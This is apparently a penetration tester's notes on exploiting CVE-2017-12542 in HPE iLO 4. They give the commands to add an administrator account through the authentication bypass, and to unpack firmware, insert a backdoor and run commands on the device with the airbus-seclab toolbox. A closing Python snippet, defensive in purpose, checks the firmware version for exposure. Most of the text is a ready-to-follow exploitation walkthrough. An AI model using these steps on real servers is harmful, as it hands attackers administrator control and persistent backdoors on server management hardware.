
Some notes on Exploiting HPE iLO4 Authentication Bypass and RCE (CVE-2017-12542)

The notes below are my own notes for exploiting CVE-2017-12542 and are incomplete. I will spend some time on how to get RCE on other firmware versions of HP iLO (as explained below).

List / Add users on the HP iLO
If you just need to list or add accounts on the HP iLO, you can use the script from https://github.com/skelsec/CVE-2017-12542 or the Metasploit module (https://www.rapid7.com/db/modules/auxiliary/admin/hp/hp_ilo_create_admin_account).

$ git clone https://github.com/skelsec/CVE-2017-12542
$ cd CVE-2017-12542
$ python exploit_1.py -t x.x.x.x
[+] Target is VULNERABLE!
[+] Account name: User Account Username: Administrator

or

$ python /pentest/CVE-2017-12542/exploit_1.py -u newadmin -p newadmin x.x.x.x

RCE on the HP iLO
The RCE/Backdoor exploit at https://github.com/airbus-seclab/ilo4_toolbox/tree/master/scripts/iLO4 currently only works for the below firmwares. Some modifications might be required to work on other versions.

Based on HP's advisory (https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us), iLO 4 firmware prior to version 2.53 is vulnerable.

The firmware for HP iLO can be downloaded from http://pingtool.org/latest-hp-ilo-firmwares/.

Steps on how to get command execution on HP iLO and extract passwords

$ git clone https://github.com/airbus-seclab/ilo4_toolbox

$ curl -s -k "https://x.x.x.x/xmldata?item=all" | grep -i "<FWRI>"
<FWRI>2.5.3</FWRI>

$ wget http://downloads.hpe.com/pub/softlib2/software1/sc-linux-fw-ilo/p192122427/v129421/CP032487.scexe

$ chmod 755 CP032487.scexe

$ ./CP032487.scexe --unpack=/tmp/iLO

$ cd ilo4_toolbox/scripts/iLO4/

$ ./insert_backdoor.sh ilo4_253.bin

$ python backdoor_client.py x.x.x.x

ib.install_linux_backdoor()
ib.cmd("/usr/bin/id")
ib.remove_linux_backdoor()
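As an added example (not code from the ilo4_toolbox or the exploit scripts above), the following Python triages the `<FWRI>` value from the unauthenticated `/xmldata?item=all` response against the 2.53 fix version from HP's advisory, which is how a defender would inventory exposed iLO 4 interfaces. The `RIMP`/`MP`/`PN` element names and the sample response are assumptions, and the dotted "2.5.3" form shown in the grep output above is treated as 2.53.

```python
"""Triage an iLO 4 /xmldata?item=all response against the CVE-2017-12542 fix version.

Added example for this page: parses the RIMP XML the curl step retrieves and
reports whether the firmware predates 2.53 (the fixed version per HPE's advisory).
"""
import xml.etree.ElementTree as ET

FIXED_VERSION = (2, 53)  # HPE advisory: iLO 4 firmware prior to 2.53 is affected


def parse_fwri(fwri: str) -> tuple:
    """Normalize an FWRI string to (major, minor).

    HPE reports iLO 4 firmware as e.g. "2.50" or "2.53"; the grep output on this
    page shows "2.5.3", so dotted minor digits are joined (assumption: "2.5.3" == 2.53).
    """
    parts = fwri.strip().split(".")
    if len(parts) < 2 or not all(p.isdigit() for p in parts):
        raise ValueError("unrecognized FWRI value: %r" % fwri)
    return int(parts[0]), int("".join(parts[1:]))


def triage_xmldata(xml_text: str) -> dict:
    """Return product name, firmware tuple and whether the fix version is met."""
    root = ET.fromstring(xml_text)
    mp = root.find("MP")  # management-processor block of the RIMP document (assumed layout)
    if mp is None or mp.findtext("FWRI") is None:
        raise ValueError("no <MP><FWRI> in response; not an iLO RIMP document?")
    product = (mp.findtext("PN") or "").strip()
    version = parse_fwri(mp.findtext("FWRI"))
    is_ilo4 = "iLO 4" in product
    return {
        "product": product,
        "is_ilo4": is_ilo4,
        "firmware": version,
        "vulnerable": is_ilo4 and version < FIXED_VERSION,
    }


# Constructed sample of the response shape (illustrative values, not from a real host).
SAMPLE_XMLDATA = """<?xml version="1.0"?>
<RIMP>
  <HSI><SPN>ProLiant DL380 Gen9</SPN></HSI>
  <MP><ST>1</ST><PN>Integrated Lights-Out 4 (iLO 4)</PN><FWRI>2.50</FWRI></MP>
</RIMP>"""

if __name__ == "__main__":
    result = triage_xmldata(SAMPLE_XMLDATA)
    state = "VULNERABLE (pre-2.53)" if result["vulnerable"] else "fixed version or not iLO 4"
    print("%s firmware %s: %s" % (result["product"], result["firmware"], state))
```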

Categories: Exploitation